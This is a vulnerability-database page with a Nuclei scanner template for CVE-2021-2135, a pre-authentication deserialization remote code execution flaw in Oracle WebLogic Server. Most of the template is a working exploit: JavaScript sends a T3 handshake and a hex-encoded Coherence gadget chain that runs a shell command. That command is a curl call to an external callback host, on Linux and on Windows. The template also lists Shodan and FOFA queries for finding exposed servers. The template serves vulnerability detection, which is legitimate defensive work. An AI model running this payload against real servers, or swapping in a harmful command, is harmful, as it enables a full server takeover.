| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the Coherence Container component of the Oracle WebLogic Server application server allows attackers to compromise the confidentiality, integrity, and accessibility of protected information. | 19 May 202100:00 | – | bdu_fstec | |
| CVE-2021-2135 | 6 Dec 202504:16 | – | circl | |
| Oracle Fusion Middleware 安全漏洞 | 20 Apr 202100:00 | – | cnnvd | |
| Unspecified Vulnerability in Oracle WebLogic Server (CNVD-2021-30934) | 21 Apr 202100:00 | – | cnvd | |
| CVE-2021-2135 | 22 Apr 202121:53 | – | cve | |
| CVE-2021-2135 | 22 Apr 202121:53 | – | cvelist | |
| Vulnerabilities fixed in Oracle Fusion Middleware | 21 Apr 202100:00 | – | ncsc | |
| CVE-2021-2135 | 22 Apr 202122:15 | – | nvd | |
| Oracle Critical Patch Update Advisory - April 2021 | 20 Apr 202100:00 | – | oracle | |
| Oracle WebLogic Server Multiple Vulnerabilities (Apr 2021 CPU) | 22 Apr 202100:00 | – | nessus |
id: CVE-2021-2135
info:
name: Oracle WebLogic Server - Remote Code Execution
author: hnd3884
severity: critical
description: |
Oracle WebLogic Server (12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0) contains a remote code execution caused by unauthenticated access via T3, IIOP, letting attackers take over the server, exploit requires network access.
impact: |
Attackers can fully compromise the server, leading to data breach, service disruption, and potential further exploitation.
remediation: |
Update to the latest patched version of Oracle WebLogic Server.
reference:
- https://www.oracle.com/security-alerts/cpuapr2021.html
- https://x-f1v3.github.io/blog/1626153074926.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-2135
epss-score: 0.0837
epss-percentile: 0.94288
cwe-id: CWE-502
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: oracle
product: weblogic_server
shodan-query:
- cpe:"cpe:2.3:a:oracle:weblogic_server"
- product:"WebLogic"
- http.server:"WebLogic"
- port:7001
fofa-query: product="WebLogic" || header="WebLogic Server"
tags: cve,cve2021,weblogic,oracle,rce,vkev
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const net = require('nuclei/net');
const address = Host + ":" + Port;
const CMD_LINUX = "curl http://rce-linux-host." + oast;
const CMD_WIN = "cmd.exe /c powershell curl http://rce-window-host." + oast;
function decimalToFixedBytes(num, byteLength = 2) {
const arr = new Uint8Array(byteLength);
for (let i = byteLength - 1; i >= 0; i--) {
arr[i] = num & 0xFF;
num = num >> 8;
}
return arr;
}
function buildLengthHex(hexStr, cmdLinux) {
var num = parseInt(hexStr, 16);
var value = num + cmdLinux.length - 19;
var buf = bytes.Buffer();
buf.Write(decimalToFixedBytes(value));
return buf.Hex();
}
function buildLengthHex2(hexStr, cmdLinux) {
var num = parseInt(hexStr, 16);
var value = num + cmdLinux.length - 90;
var buf = bytes.Buffer();
buf.Write(decimalToFixedBytes(value));
return buf.Hex();
}
function stringToHex(str) {
var buf = bytes.Buffer();
buf.WriteString(str);
return buf.Hex();
}
function sendExploit(payload) {
s1 = net.Open('tcp', address);
s1.SendHex("743320372e302e302e300a41533a31300a484c3a31390a0a");
s1.Recv(4096);
s1.SendHex(payload);
}
sample = "00000486086501ffffffffffffffff00000000041000aced00057372002e636f6d2e74616e676f736f6c2e636f686572656e63652e736572766c65742e417474726962757465486f6c646572cc30a4783def6ac10c000078707a0000016f400a2d636f6d2e74616e676f736f6c2e7574696c2e70726f636573736f722e436f6e646974696f6e616c507574416c6c0a27636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4d61704576656e7446696c7465720000000000020a2c636f6d2e74616e676f736f6c2e696e7465726e616c2e7574696c2e53696d706c6542696e617279456e74727907000000d30a39636f6d2e74616e676f736f6c2e7574696c2e61676772656761746f722e546f704e41676772656761746f72245061727469616c526573756c740a38636f6d2e74616e676f736f6c2e636f686572656e63652e726573742e7574696c2e657874726163746f722e4d76656c457874726163746f720000000091016a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f632063616c632e65786522293b72657475726e206e657720496e74656765722831293b020000000101010700000002010001010b73720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e58537472696e671c0a273b4816c5fd02000078720031636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e6f626a656374732e584f626a656374f4981209bb7bb6190200014c00056d5f6f626a7400124c6a6176612f6c616e672f4f626a6563743b7872002c636f6d2e73756e2e6f72672e6170616368652e78706174682e696e7465726e616c2e45787072657373696f6e07d9a61c8dacacd60200014c00086d5f706172656e747400324c636f6d2f73756e2f6f72672f6170616368652f78706174682f696e7465726e616c2f45787072657373696f6e4e6f64653b7870707077050102000000781000aced0005737200307765626c6f6769632e73656375726974792e61636c2e696e7465726e616c2e41757468656e74696361746564557365725cf8e9684f73eb7b0200074900096c6f63616c506f7274420003716f734a000974696d655374616d704c000b696e6574416464726573737400164c6a6176612f6e65742f496e6574416464726573733b4c000c6c6f63616c4164647265737371007e00014c00046e616d657400124c6a6176612f6c616e672f537472696e673b5b00097369676e61747572657400025b427870ffffffff650000019af1762bd070707400087765626c6f676963757200025b42acf317f8060854e0020000787000000010fef0048c9180baa747c69effdef421f41000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771c01000000000000000100093132372e302e302e3183b5795200000000781000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707711000000000000000001000000000000000078";
// payload
payload_linux = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_LINUX)).replace('0486', buildLengthHex('0486', CMD_LINUX)).replace('016f', buildLengthHex('016f', CMD_LINUX)).replace('00d3', buildLengthHex('00d3', CMD_LINUX)).replace('0091', buildLengthHex('0091', CMD_LINUX));
payload_win = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_WIN)).replace('0486', buildLengthHex('0486', CMD_WIN)).replace('016f', buildLengthHex('016f', CMD_WIN)).replace('00d3', buildLengthHex('00d3', CMD_WIN)).replace('009101', buildLengthHex2('0098', CMD_WIN) + '02');
// send exploit
sendExploit(payload_linux)
sendExploit(payload_win)
args:
Host: "{{Host}}"
Port: "7001"
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- type: word
part: interactsh_request
words:
- "rce-linux"
- "rce-window"
condition: or
extractors:
- type: regex
part: interactsh_request
regex:
- 'rce-(linux|window)[^\s]*'
# digest: 4a0a00473045022100fdb090e912d14163c6acb368ceb5c07ed2947d2048d92b9080a047ab45f0161f02206b5931d4e02f4a9fb42a83776266bc2bccfbc252ff46dd935c8ef5a2b5620851:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation